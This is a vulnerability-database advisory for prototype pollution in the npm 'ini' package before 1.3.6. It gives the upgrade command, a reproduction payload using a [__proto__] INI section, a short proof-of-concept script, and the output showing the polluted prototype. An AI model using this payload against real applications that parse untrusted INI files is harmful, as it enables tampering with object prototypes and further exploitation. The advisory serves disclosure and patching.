VDB
Sign up
HIGH7.3

GHSA-qqgx-2p2h-9c37

ini before 1.3.6 vulnerable to Prototype Pollution via ini.parse

Quick fix

GHSA-qqgx-2p2h-9c37 — ini: upgrade to the fixed version with the command below.

npm install ini@1.3.6

Details

### Overview The `ini` npm package before version 1.3.6 has a Prototype Pollution vulnerability.

If an attacker submits a malicious INI file to an application that parses it with `ini.parse`, they will pollute the prototype on the application. This can be exploited further depending on the context.

### Patches

This has been patched in 1.3.6.

### Steps to reproduce

payload.ini ``` [__proto__] polluted = "polluted" ```

poc.js: ``` var fs = require('fs') var ini = require('ini')

var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8')) console.log(parsed) console.log(parsed.__proto__) console.log(polluted) ```

``` > node poc.js {} { polluted: 'polluted' } { polluted: 'polluted' } polluted ```

Are you affected?

Enter the version of the package you're using.

Affected packages

npm/ini
Introduced in: 0Fixed in: 1.3.6
Fixnpm install ini@1.3.6

References